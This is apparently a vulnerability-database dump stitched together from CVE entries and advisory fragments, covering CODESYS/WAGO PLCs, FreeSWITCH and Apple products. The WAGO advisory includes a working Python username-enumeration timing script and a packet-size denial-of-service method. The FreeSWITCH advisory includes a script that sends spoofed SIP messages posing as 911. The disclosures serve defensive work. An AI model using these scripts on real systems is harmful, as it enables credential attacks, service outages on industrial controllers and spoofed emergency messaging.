https://access.redhat.com/security/cve/CVE-2021-41182
https://access.redhat.com/security/cve/CVE-2021-41183
https://access.redhat.com/security/cve/CVE-2021-41184
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYo/qI9zjgjWX9erEAQhpng//aJBlyx9sUzPTC08WE6OwY4Ihk8b0wSh5
C9RWX/PmlDE2CAivQHpSs8D7/IizHl4Arn6f0HJx+NavN8YfbApqs2mcq+KUKYuC
/VxCb3YlukeDsXeYIM+ScifS9M+N+WNGy9BRrlcYxZ4Ya5zLYv/ibrrHCX44yKz8
Jg5abyQyCzI6DEPjSDRIZkULLIdkbQ8xGd7j5P4ThAR2MRf8deeHez4/NmfrQm6n
Q3f4qeQlljiNgoGdxa2z65Shxpb3pkWGt81MZuMwKpRa6EDBDs8vGMA0LZamsikv
XZUU2P7d+JrXvLd2bmfGty6EaQ2FY0XoB0vvK1AyUhSZkX2thUvFsEgIdWjLSu4a
eT28D2etZLTIyl1DB42L+5gcomaQTn0sT0i99ExWkFyf9xWne+ygOFYydjV0/fy+
530Pwzlk9c2QtHgJ/XzGU12QLzKa/tvLbqXTfmAmlqDkU/+3aIr2l5SgnudzY4NN
BAUae8noIVWEs6L+6DY5HYt+x+WYYLipQh9gPjpBOaH+sEFvZ2+GzlVR0zF4IM5E
qLH5bopwO6GfHeNjv+4U+l+3kjhJIpwrsy/uzc+/mExrraYFpZc8skbcGRyhQ7ML
CtHSV7Y4x/OguhgYeqx1ocCfpIpkbu4MGa4esGDW4ocvL03AHnbxOG7gGvBH35oF
cada2etYwu0=nreb
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
| VAR-202110-1618 | CVE-2021-34585 | CODESYS V2 Unchecked Return Value Vulnerability in Web Servers |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
In the CODESYS V2 web server prior to V1.1.9.22 crafted web server requests can trigger a parser error. Since the parser result is not checked under all conditions, a pointer dereference with an invalid address can occur. This leads to a denial of service situation. CODESYS V2 An unchecked return value vulnerability exists in web servers.Service operation interruption (DoS) It may be in a state
| VAR-202110-1617 | CVE-2021-34593 | CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT Vulnerability in handling exceptional conditions in |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
In CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56 unauthenticated crafted invalid requests may result in several denial-of-service conditions. Running PLC programs may be stopped, memory may be leaked, or further communication clients may be blocked from accessing the PLC.
Vulnerability overview/description:
-----------------------------------
The CODESYS Control runtime system is the core of many PLCs. The runtime is
accepting TCP connections on a pre-configured port to connect to the
development system.
CODESYS released a dedicated security note, which corresponds to this advisory:
https://customers.codesys.com/index.php?eID=dumpFile&t=f&f=16877&token=8faab0fc1e069f4edfca5d5aba8146139f67a175
Proof of concept:
-----------------
A detailed proof of concept will be made public after the affected product
vendors had time to provide new firmware versions.
2021-08-11: Vendor states that this issue was already fixed in a recent CODESYS
release. The vendor is notified
again about this outcome.
Workaround:
-----------
To mitigate this issue, access to the CODESYS service port of the affected
devices should be limited as far as possible. In the long run, the updated
firmware of the product vendor containing a patched CODESYS service must be
installed. SEC Consult Vulnerability Lab Security Advisory < 20220126-0 >
=======================================================================
title: Denial of service & User Enumeration
product: WAGO 750-8xxx PLC
vulnerable version: < Firmware 20 Patch 1 (v03.08.08)
fixed version: Firmware 20 Patch 1 (v03.08.08)
CVE number: CVE-2021-34593
impact: Medium
homepage: https://www.wago.com/
found: 2021-05-05
by: SEC Consult Vulnerability Lab
These vulnerabilities were discovered during the research
cooperation initiative "OT Cyber Security Lab" between
Verbund AG and SEC Consult Group.
Gerhard Hechenberger (Office Vienna)
Steffen Robertz (Office Vienna)
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Optimum performance and availability: Thanks to their ultra-high performance,
low power consumption, numerous interfaces, space-saving design and high
reliability, WAGO’s user-friendly controllers (PLCs) are cost-effective
automation solutions. For optimal automation both inside and outside the
control cabinet: the flexible IP20 remote I/O systems for all applications
and environments."
Source: https://www.wago.com/us/c/controllers-bus-couplers-i-o
Business recommendation:
------------------------
WAGO's customers should upgrade the firmware to the latest version available.
A thorough security review should be performed by security professionals to
identify further security issues.
Vulnerability overview/description:
-----------------------------------
1) Denial of Service (Codesys) (CVE-2021-34593)
The "plclinux_rt" binary is listening on port 2455. It handles communication with
the CODESYS suite. By sending requests that define an invalid packet size, a
malloc error can be triggered. This leads to a denial of service of the remote
connectivity of the codesys service.
This was also reported to and released together with CODESYS, find the
corresponding advisories here:
https://sec-consult.com/vulnerability-lab/advisory/codesys-v2-denial-of-service/
https://customers.codesys.com/index.php?eID=dumpFile&t=f&f=16877&token=8faab0fc1e069f4edfca5d5aba8146139f67a175
2) Enumeration of Users
Due to a time-based side channel vulnerability, it can be derived which
usernames are valid. This eases the process of brute-forcing valid credentials.
3) Outdated Software with Known Vulnerabilities
The PLC is using multiple outdated software components with known exploits.
4) Insufficient Hardening of Binaries
Multiple binaries are not compiled with available security features. This will
ease further attacks once a memory corruption vulnerability has been spotted.
Proof of concept:
-----------------
1) Denial of Service (Codesys) (CVE-2021-34593)
Codesys packet headers are structured like below (pseudo code):
struct codesys_header {
uint16_t magic,
int32_t packet_size
}
The magic bytes will be 0xbbbb. By defining a packet size of 0xffffffff, a size
of 4 GB is defined. The following pseudo code will be used to handle the
request:
allocated_mem = (byte*)SysAllocDataMemory(coedesys_header.packet_size);
buffer_info->recv_buf_wout_header = allocated_mem;
if (allocated_mem == (byte *)0x0) {
return;
}
As 4GB of memory aren't available, malloc will return a NULL pointer, which is
passed back through the SysAllocDataMemory() function and the return statement
in the pseudo code will be hit. Thus, the TCPServerTask() function will return.
The file descriptor for the client is not cleared in advance. Therefore, the
socket stays open indefinitely. A new client will open the next file
descriptor. As only 19 clients are allowed to be connected simultaneously, it
is sufficient to send 19 requests with a wrong packet length to force the PLC
into a state where it will refuse further connections to the Codesys service.
The current implementation is missing the call to SysSockClose() once a buffer
allocation fails.
2) Enumeration of Users
A time-based side channel vulnerability in the webserver's authentication
method is leaking information about valid usernames. The following code snippet is
used in the login method:
// get password file and iterate over every line
$pwFileArray = file($passwordFilename);
foreach($pwFileArray as $lineNo => $pwFileLine)
{
// extract username and user password
$passwordFileData = explode(':', trim($pwFileLine));
// if username was found in line, verify given password with user password
if(isset($passwordFileData[0]) && ($passwordFileData[0] === $username))
{
$pwCorrect = password_verify($password, $passwordFileData[1]);
break;
}
}
The password hash is only calculated if the username is found to be valid. As
the PLC has limited computational power, this results in different timings for
the response depending on the validity of the username. The following script
can be used to find valid users. The parameter 'delay_valid' might need to be
adjusted to the network speed:
----------------------------
#!/usr/sbin/python
import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
delay_valid = 0.2
f = open(sys.argv[1],"r");
for user in f.readlines():
payload = {"username":user.replace('\n',''),"password":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
cnt = 0
for i in range(5):
try:
r = requests.post("https://<your_PLC_IP>/wbm/php/authentication/login.php", json=payload, timeout=delay_valid, verify=False)
except:
cnt = cnt +1
if cnt >=3:
print("[*]Valid User: {}".format(user))
-----------------------------
3) Outdated Software with Known Vulnerabilities
Following outdated and vulnerable components were identified by using the IoT Inspector
firmware analysis tool:
- Dsnmasq 2.80: 9 CVEs
- Bash 4.4.23: 1 CVE
- GNU glibc 2.30: 12 CVEs
- Linux Kernel 4.9.146: 663 CVEs
- OpenSSL 1.0.1: 103 CVEs
- BusyBox 1.30.1: 2 CVEs
- Curl 7.72.0: 1 CVE
- OpenSSH 7.9p1: 4 CVEs
- PHP 7.3.15: 11 CVEs
- Wpa_supplicant 2.6: 20 CVEs
- NET-SNMP 5.8: 1 CVE
- Libpcap 1.8.1: 5 CVEs
- Info-ZIP 3.0: 13 CVEs
4) Insufficient Hardening of Binaries
The following features were extracted with the IoT Inspector:
- 1.9% of all executables support full RELRO
- 84.6% support partial RELRO
- Only 3.6% of all executables make use of stack canaries
- 58.9% are using ASLR/PIE
The plclinux_rt binary is an example of a particularly vulnerable binary. It
accepts user input on port 2455 and is missing all compile-time security
features. Thus, it's a perfect candidate to successfully exploit any identified
buffer overflow.
Vulnerable / tested versions:
-----------------------------
The following versions have been tested and found to be vulnerable:
* WAGO 750-8xxx Firmware 18 (v03.06.11)
* WAGO 750-8xxx Firmware 15 (v03.03.10)
Vendor contact timeline:
------------------------
2021-05-25: Contacting vendor through support.at@wago.com, asking for
security contact information. Support informed about their
PSIRT team. Set preliminary release date to 2021-07-14.
2021-05-26: Contacting PSIRT through psirt@wago.com for encryption options.
2021-05-27: Received PGP key from PSIRT, transmitted encrypted advisory
to psirt@wago.com.
2021-05-31: Wago PSIRT notifies about decryption problems.
2021-06-02: Wago PSIRT redirects to VDE CERT for encrypted transmission.
Transmitted encrypted advisory to info@cert.vde.com. Set release
date to 2021-07-22. Wago PSIRT resolves decryption problems.
2021-06-07: Received confirmation from VDE CERT.
2021-08-11: On request, Wago PSIRT informs about the investigation results
and mentions that the DoS was already reported and is fixed with
firmware 18 patch 3.
2021-08-18: A check on the most recent public firmware release
v18 (v03.06.19) shows that the vulnerability still exists. Wago
PSIRT is notified.
2021-09-01: Wago PSIRT confirms and ensures the issue is investigated.
2021-09-29: Request status from Wago PSIRT. Set new release date to 2021-11-16.
2021-09-30: Wago PSIRT states that CODESYS provided a fix which is currently
tested and to wait for a coordinated release with CODESYS.
2021-10-15: CODESYS informs about the assigned CVE-2021-34593 and the planned
publishing date.
2021-10-18: Requesting information from Wago on an updated firmware version.
2021-10-19: Wago PSIRT states that they just received the new CODESYS sources
and it will take some more weeks to create a new firmware release.
2021-10-28: CODESYS vulnerability CVE-2021-34593 is released in a coordinated
manner together with CODESYS group without exploit details.
2021-11-30: Request status from Wago PSIRT on new firmware release.
2022-01-17: Request status from Wago PSIRT on new firmware release again.
2022-01-18: Wago PSIRT informs that firmware 20 Patch 1 released on January 10,
2022 fixes the remaining issue. The firmware was not yet published
on their website.
2022-01-26: Release of security advisory.
Solution:
---------
Immediately update the PLCs to the fixed firmware version provided by the
vendor to mitigate CVE-2021-34593.
The fixed firmware release 20 patch 1 can be obtained from
https://www.wago.com/de/d/6599873
Regarding vulnerability 2)
As stated by Wago, there are only two possible default usernames. Therefore,
the username enumeration may not gain additional information and this will
not be changed.
Additionally, due to varying release cycles, there is a delay
in updating components (affecting the other identified vulnerabilities). It is
planned to change to a new distribution release with firmware 20.
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Gerhard Hechenberger, Steffen Robertz / @2022
| VAR-202110-1255 | CVE-2021-34583 | CODESYS V2 Out-of-Bounds Write Vulnerability in Web Server |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Crafted web server requests may cause a heap-based buffer overflow and could therefore trigger a denial-of- service condition due to a crash in the CODESYS V2 web server prior to V1.1.9.22. CODESYS V2 Web servers contain an out-of-bounds write vulnerability.Service operation interruption (DoS) It may be in a state
| VAR-202110-1254 | CVE-2021-34584 | CODESYS V2 Buffer Overread Vulnerability in Web Server |
CVSS V2: 6.4 CVSS V3: 9.1 Severity: CRITICAL |
Crafted web server requests can be utilised to read partial stack or heap memory or may trigger a denial-of- service condition due to a crash in the CODESYS V2 web server prior to V1.1.9.22
| VAR-202110-1253 | CVE-2021-34586 | CODESYS V2 on the web server NULL Pointer dereference vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
In the CODESYS V2 web server prior to V1.1.9.22 crafted web server requests may cause a Null pointer dereference in the CODESYS web server and may result in a denial-of-service condition
| VAR-202110-1143 | CVE-2021-34595 | CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT Use of out-of-bounds pointer offset vulnerability in |
CVSS V2: 5.5 CVSS V3: 8.1 Severity: HIGH |
A crafted request with invalid offsets may cause an out-of-bounds read or write access in CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56, resulting in a denial-of-service condition or local memory overwrite. CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT contains a vulnerability related to the use of out-of-bounds pointer offsets.Information is tampered with and service operation is interrupted (DoS) It may be in a state
| VAR-202110-1142 | CVE-2021-34596 | CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT Vulnerability in accessing uninitialized pointers in |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A crafted request may cause a read access to an uninitialized pointer in CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56, resulting in a denial-of-service condition
| VAR-202110-1421 | CVE-2021-29844 | IBM Engineering Requirements Management DOORS Next Code problem vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
IBM Jazz Team Server products is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.
| VAR-202110-1542 | CVE-2021-41145 | FreeSWITCH Vulnerability regarding lack of memory release after expiration in |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. FreeSWITCH prior to version 1.10.7 is susceptible to Denial of Service via SIP flooding. When flooding FreeSWITCH with SIP messages, it was observed that after a number of seconds the process was killed by the operating system due to memory exhaustion. By abusing this vulnerability, an attacker is able to crash any FreeSWITCH instance by flooding it with SIP messages, leading to Denial of Service. The attack does not require authentication and can be carried out over UDP, TCP or TLS. This issue was patched in version 1.10.7. FreeSWITCH Contains a vulnerability regarding the lack of free memory after expiration.Service operation interruption (DoS) It may be in a state. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications
| VAR-202110-1048 | CVE-2021-37624 | FreeSWITCH Authentication vulnerability in |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication. FreeSWITCH There is an authentication vulnerability in.Information may be tampered with. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications.
We are issuing this advisory because, in the course of our work, we have noticed that most FreeSWITCH installations that are exposed to the Internet do not authenticate MESSAGE requests.
## How to reproduce the issue
1. Install FreeSWITCH v1.10.6 or lower
2. Run FreeSWITCH using the default configuration
3. Register as a legitimate SIP user with the FreeSWITCH server (e.g. `sip:1000@192.168.1.100` where `192.168.1.100` is your FreeSWITCH server) using a softphone that can process MESSAGE (such as Zoiper)
4. Save the below Python script to `anon-message.py`
5. Run the Python script `python anon-message.py <freeswitch_ip> <target_extension>`
6. Observe the SIP message appear on your softphone, pretending to be from 911
```python
import sys, socket, random, string
UDP_IP = sys.argv[1]
UDP_PORT = 5060
ext = sys.argv[2]
rand = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
msg="MESSAGE sip:%s@%s SIP/2.0\r\n" % (ext, UDP_IP)
msg+="Via: SIP/2.0/UDP 192.168.1.159:46896;rport;branch=z9hG4bK-%s\r\n" % rand
msg+="Max-Forwards: 70\r\n"
msg+="From: 911 <sip:911@%s>;tag=%s\r\n" %(UDP_IP, rand)
msg+="To: <sip:%s@%s>\r\n" %(ext, UDP_IP)
msg+="Call-ID: %s\r\n" % rand
msg+="CSeq: 1 MESSAGE\r\n"
msg+="Contact: <sip:911@192.168.1.159:48760;transport=udp>\r\n"
msg+="Content-Type: text/plain\r\n"
msg+="Content-Length: 5\r\n\r\n"
msg+="hello"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(msg.encode(), (UDP_IP, UDP_PORT))
```
## Solution and recommendations
Upgrade to a version of FreeSWITCH that fixes this issue.
## About Enable Security
[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.
## Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
## Disclosure policy
This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>
| VAR-202110-1372 | CVE-2021-41157 | FreeSWITCH Vulnerability regarding lack of authentication for critical features in |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. By default, SIP requests of the type SUBSCRIBE are not authenticated in the affected versions of FreeSWITCH. Abuse of this security issue allows attackers to subscribe to user agent event notifications without the need to authenticate. This abuse poses privacy concerns and might lead to social engineering or similar attacks. For example, attackers may be able to monitor the status of target SIP extensions. Although this issue was fixed in version v1.10.6, installations upgraded to the fixed version of FreeSWITCH from an older version, may still be vulnerable if the configuration is not updated accordingly. Software upgrades do not update the configuration by default. SIP SUBSCRIBE messages should be authenticated by default so that FreeSWITCH administrators do not need to explicitly set the `auth-subscriptions` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication. FreeSWITCH There is a vulnerability in the lack of authentication for critical features.Information may be obtained. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications. There is a security vulnerability in FreeSWITCH versions 1.10.5 and earlier versions
| VAR-202110-1371 | CVE-2021-41158 | FreeSWITCH Vulnerability regarding information leakage in |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges. FreeSWITCH There is a vulnerability related to information leakage.Information may be obtained
| VAR-202110-1256 | CVE-2021-41105 | FreeSWITCH Vulnerability in |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: MEDIUM |
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. When handling SRTP calls, FreeSWITCH prior to version 1.10.7 is susceptible to a DoS where calls can be terminated by remote attackers. This attack can be done continuously, thus denying encrypted calls during the attack. When a media port that is handling SRTP traffic is flooded with a specially crafted SRTP packet, the call is terminated leading to denial of service. This issue was reproduced when using the SDES key exchange mechanism in a SIP environment as well as when using the DTLS key exchange mechanism in a WebRTC environment. The call disconnection occurs due to line 6331 in the source file `switch_rtp.c`, which disconnects the call when the total number of SRTP errors reach a hard-coded threshold (100). By abusing this vulnerability, an attacker is able to disconnect any ongoing calls that are using SRTP. The attack does not require authentication or any special foothold in the caller's or the callee's network. This issue is patched in version 1.10.7. FreeSWITCH Exists in unspecified vulnerabilities.Service operation interruption (DoS) It may be in a state. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications. FreeSWITCH has an input validation error vulnerability, which arises from network systems or products that do not adequately verify the origin or authenticity of data. Attackers can use forged data to attack. [ES2021-09] FreeSWITCH susceptible to Denial of Service via invalid SRTP packets
| VAR-202110-1677 | CVE-2021-30823 | plural Apple Product vulnerabilities |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.0.1, iOS 14.8 and iPadOS 14.8, tvOS 15, Safari 15, watchOS 8. An attacker in a privileged network position may be able to bypass HSTS. plural Apple There are unspecified vulnerabilities in the product.Information may be tampered with.
CVE-2021-30811: an anonymous researcher working with Compartir
bootp
Available for: Apple Watch Series 3 and later
Impact: A device may be passively tracked by its WiFi MAC address
Description: A user privacy issue was addressed by removing the
broadcast MAC address.
CVE-2021-30857: Zweig of Kunlun Lab
libexpat
Available for: Apple Watch Series 3 and later
Impact: A remote attacker may be able to cause a denial of service
Description: This issue was addressed by updating expat to version
2.4.1.
CVE-2013-0340: an anonymous researcher
Preferences
Available for: Apple Watch Series 3 and later
Impact: An application may be able to access restricted files
Description: A validation issue existed in the handling of symlinks.
CVE-2021-30808: Csaba Fitzl (@theevilbit) of Offensive Security
Entry added October 25, 2021
WebKit
Available for: Apple Watch Series 3 and later
Impact: Visiting a maliciously crafted website may reveal a user's
browsing history
Description: The issue was resolved with additional restrictions on
CSS compositing.
Installation note:
Instructions on how to update your Apple Watch software are
available at https://support.apple.com/kb/HT204641
To check the version on your Apple Watch, open the Apple Watch app
on your iPhone and select "My Watch > General > About".
Alternatively, on your watch, select "My Watch > General > About".
Information about the security content is also available at
https://support.apple.com/HT212869.
AppKit
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious application may be able to elevate privileges
Description: A logic issue was addressed with improved state
management.
CVE-2021-30873: Thijs Alkemade of Computest
AppleScript
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: Processing a maliciously crafted AppleScript binary may
result in unexpected application termination or disclosure of process
memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2021-30876: Jeremy Brown, hjy79425575
CVE-2021-30879: Jeremy Brown, hjy79425575
CVE-2021-30877: Jeremy Brown
CVE-2021-30880: Jeremy Brown
Audio
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious application may be able to elevate privileges
Description: An integer overflow was addressed through improved input
validation.
CVE-2021-30907: Zweig of Kunlun Lab
Bluetooth
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A race condition was addressed with improved state
handling.
CVE-2021-30899: Weiteng Chen, Zheng Zhang, and Zhiyun Qian of UC
Riverside, and Yu Wang of Didi Research America
ColorSync
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: A memory corruption issue existed in the processing of
ICC profiles.
CVE-2021-30917: Alexandru-Vlad Niculae and Mateusz Jurczyk of Google
Project Zero
Continuity Camera
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A local attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: This issue was addressed with improved checks.
CVE-2021-30903: an anonymous researcher
CoreAudio
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: Processing a maliciously crafted file may disclose user
information
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2021-30905: Mickey Jin (@patch1t) of Trend Micro
CoreGraphics
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: Processing a maliciously crafted PDF may lead to arbitrary
code execution
Description: An out-of-bounds write was addressed with improved input
validation.
CVE-2021-30919
FileProvider
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: An input validation issue was addressed with improved
memory handling.
CVE-2021-30881: Simon Huang (@HuangShaomang) and pjf of IceSword Lab
of Qihoo 360
Game Center
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious application may be able to access information
about a user's contacts
Description: A logic issue was addressed with improved restrictions.
CVE-2021-30895: Denis Tokarev
Game Center
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious application may be able to read user's gameplay
data
Description: A logic issue was addressed with improved restrictions.
CVE-2021-30896: Denis Tokarev
iCloud
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A local attacker may be able to elevate their privileges
Description: This issue was addressed with improved checks.
CVE-2021-30906: Cees Elzinga
Intel Graphics Driver
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2021-30824: Antonio Zekic (@antoniozekic) of Diverto
Intel Graphics Driver
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: Multiple out-of-bounds write issues were addressed with
improved bounds checking.
